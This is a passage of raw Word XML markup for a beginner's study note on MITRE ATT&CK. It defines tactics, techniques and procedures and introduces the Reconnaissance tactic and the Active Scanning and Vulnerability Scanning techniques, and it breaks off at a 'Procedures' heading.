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F9E" w:rsidRDefault="00A6781E" w:rsidP="00A6781E">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:color w:val="FF3300"/>
          <w:sz w:val="48"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A6781E">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF3300"/>
          <w:sz w:val="48"/>
        </w:rPr>
        <w:t>MITRE ATT&amp;CK</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A6781E" w:rsidRDefault="00A6781E" w:rsidP="00A6781E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A6781E">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF3300"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">TTPs: </w:t>
      </w:r>
      <w:r w:rsidRPr="00A6781E">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Tactics, Techniques, and Procedures</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A6781E" w:rsidRPr="00A6781E" w:rsidRDefault="00A6781E" w:rsidP="00A6781E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A6781E">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Tactics: </w:t>
      </w:r>
      <w:r w:rsidRPr="00A6781E">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidRPr="00A6781E">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>high-level goals</w:t>
      </w:r>
      <w:r w:rsidRPr="00A6781E">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> or objectives attackers want to achieve during an intrusion. Think of these as </w:t>
      </w:r>
      <w:r w:rsidRPr="00A6781E">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>"why"</w:t>
      </w:r>
      <w:r w:rsidRPr="00A6781E">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> the attacker is doing something.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A6781E" w:rsidRPr="00A6781E" w:rsidRDefault="00A6781E" w:rsidP="00A6781E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A6781E">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Techniques: </w:t>
      </w:r>
      <w:r w:rsidRPr="00A6781E">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidRPr="00A6781E">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>specific methods</w:t>
      </w:r>
      <w:r w:rsidRPr="00A6781E">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> used to achieve those goals. This is the </w:t>
      </w:r>
      <w:r w:rsidRPr="00A6781E">
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>"how"</w:t>
      </w:r>
      <w:r w:rsidRPr="00A6781E">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> attackers do it. Each tactic has many techniques.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A6781E" w:rsidRPr="00A6781E" w:rsidRDefault="00A6781E" w:rsidP="00264887">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A6781E">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Procedures:</w:t>
      </w:r>
      <w:r w:rsidRPr="00A6781E">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> The </w:t>
      </w:r>
      <w:r w:rsidRPr="00A6781E">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>exact implementation or tools</w:t>
      </w:r>
      <w:r w:rsidRPr="00A6781E">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> an attacker uses in real attacks. These are concrete examples of techniques in real life.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A6781E" w:rsidRPr="00A6781E" w:rsidRDefault="00A6781E" w:rsidP="00264887">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A6781E">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Tactic → why</w:t>
      </w:r>
      <w:r w:rsidRPr="00A6781E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> (e.g., maintain access)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A6781E" w:rsidRPr="00A6781E" w:rsidRDefault="00A6781E" w:rsidP="00264887">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A6781E">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Technique → how</w:t>
      </w:r>
      <w:r w:rsidRPr="00A6781E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> (e.g., web shell, bootkit, etc.)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A6781E" w:rsidRDefault="00A6781E" w:rsidP="00264887">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A6781E">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Procedure → specific tool/config</w:t>
      </w:r>
      <w:r w:rsidRPr="00A6781E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> (e.g., China Chopper)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A6781E" w:rsidRPr="00A6781E" w:rsidRDefault="00A6781E" w:rsidP="00264887">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:outlineLvl w:val="1"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A6781E">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Why this is useful:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A6781E" w:rsidRPr="00A6781E" w:rsidRDefault="00A6781E" w:rsidP="00264887">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A6781E">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">Helps defenders understand </w:t>
      </w:r>
      <w:r w:rsidRPr="00A6781E">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>what attackers want (tactics)</w:t>
      </w:r>
      <w:r w:rsidRPr="00A6781E">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A6781E" w:rsidRPr="00A6781E" w:rsidRDefault="00A6781E" w:rsidP="00A6781E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A6781E">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>How they do it (techniques)</w:t>
      </w:r>
      <w:r w:rsidRPr="00A6781E">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A6781E" w:rsidRPr="00A6781E" w:rsidRDefault="00A6781E" w:rsidP="00EC4980">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A6781E">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">And </w:t>
      </w:r>
      <w:r w:rsidRPr="00A6781E">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>exactly what it looks like in practice (procedures)</w:t>
      </w:r>
      <w:r w:rsidRPr="00A6781E">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A6781E" w:rsidRPr="00A6781E" w:rsidRDefault="00A6781E" w:rsidP="00A6781E">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A6781E">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>MITRE ATT&amp;CK</w:t>
      </w:r>
      <w:r w:rsidRPr="00A6781E">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> organizes all this knowledge into a big matrix.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00264887" w:rsidRDefault="00EC4980" w:rsidP="00A6781E">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EC4980">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4C69E7E0" wp14:editId="73D687D9">
            <wp:extent cx="6187752" cy="27527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603"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6188710" cy="2753151"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A6781E" w:rsidRDefault="00A6781E" w:rsidP="00264887">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00264887" w:rsidRDefault="00264887" w:rsidP="00264887">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00264887" w:rsidRDefault="00264887" w:rsidP="00264887">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00264887" w:rsidRDefault="00264887" w:rsidP="00264887">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00264887" w:rsidRDefault="00264887" w:rsidP="00264887">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00264887" w:rsidRDefault="00264887" w:rsidP="00264887">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00264887" w:rsidRDefault="00983185" w:rsidP="00983185">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Reconnaissance </w:t>
      </w:r>
      <w:r w:rsidRPr="00983185">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Tactic (TA0043)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F34F9E" w:rsidRPr="00983185" w:rsidRDefault="00983185" w:rsidP="00F34F9E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00983185">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Reconnaissance is</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> the initial phase of the cyber </w:t>
      </w:r>
      <w:r w:rsidRPr="00983185">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>attack lifecycle, where adversaries gather intelligence to plan future operations. This involves active or passive methods to collect information about victim organizations, infrastructure, or personnel. Data obtained here supports later stages like Initial Access or Objective Scoping.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F34F9E" w:rsidRDefault="00F34F9E" w:rsidP="00F34F9E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00706A2A" w:rsidRPr="00C66C5E" w:rsidRDefault="00706A2A" w:rsidP="00706A2A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C66C5E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Key Objectives:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00706A2A" w:rsidRPr="00C66C5E" w:rsidRDefault="00706A2A" w:rsidP="00C66C5E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C66C5E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Identify vulnerabilities for exploitation.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00706A2A" w:rsidRPr="00C66C5E" w:rsidRDefault="00706A2A" w:rsidP="00C66C5E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C66C5E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Map organizational structure for social engineering.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00706A2A" w:rsidRPr="00C66C5E" w:rsidRDefault="00706A2A" w:rsidP="00C66C5E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C66C5E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Discover network weaknesses for infiltration.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00706A2A" w:rsidRPr="00C66C5E" w:rsidRDefault="00706A2A" w:rsidP="00706A2A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00706A2A" w:rsidRPr="00C66C5E" w:rsidRDefault="00C66C5E" w:rsidP="00706A2A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C66C5E">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">1) </w:t>
      </w:r>
      <w:r w:rsidR="00706A2A" w:rsidRPr="00C66C5E">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Active Scanning (T1595)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00706A2A" w:rsidRPr="00C66C5E" w:rsidRDefault="00706A2A" w:rsidP="00706A2A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C66C5E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Definition: Adversaries probe victim infrastructure via direct network interactions (e.g., sending packets) to identify live systems, open ports, or vulnerabilities. Unlike passive methods, this generates detectable traffic.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00706A2A" w:rsidRPr="00C66C5E" w:rsidRDefault="00706A2A" w:rsidP="00706A2A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00706A2A" w:rsidRPr="00C66C5E" w:rsidRDefault="00706A2A" w:rsidP="00706A2A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C66C5E">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Sub-technique Focus: Vulnerability Scanning (T1595.002)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00706A2A" w:rsidRPr="00C66C5E" w:rsidRDefault="00706A2A" w:rsidP="00706A2A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C66C5E">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Definition:</w:t>
      </w:r>
      <w:r w:rsidRPr="00C66C5E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> Scanning for specific software/configuration weakness</w:t>
      </w:r>
      <w:r w:rsidR="00C66C5E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>es (e.g., unpatched services)</w:t>
      </w:r>
      <w:r w:rsidRPr="00C66C5E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00706A2A" w:rsidRPr="00C66C5E" w:rsidRDefault="00706A2A" w:rsidP="00706A2A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C66C5E">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Procedures</w:t>
      </w:r>
      <w:r w:rsidR="00C66C5E">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>:</w:t>
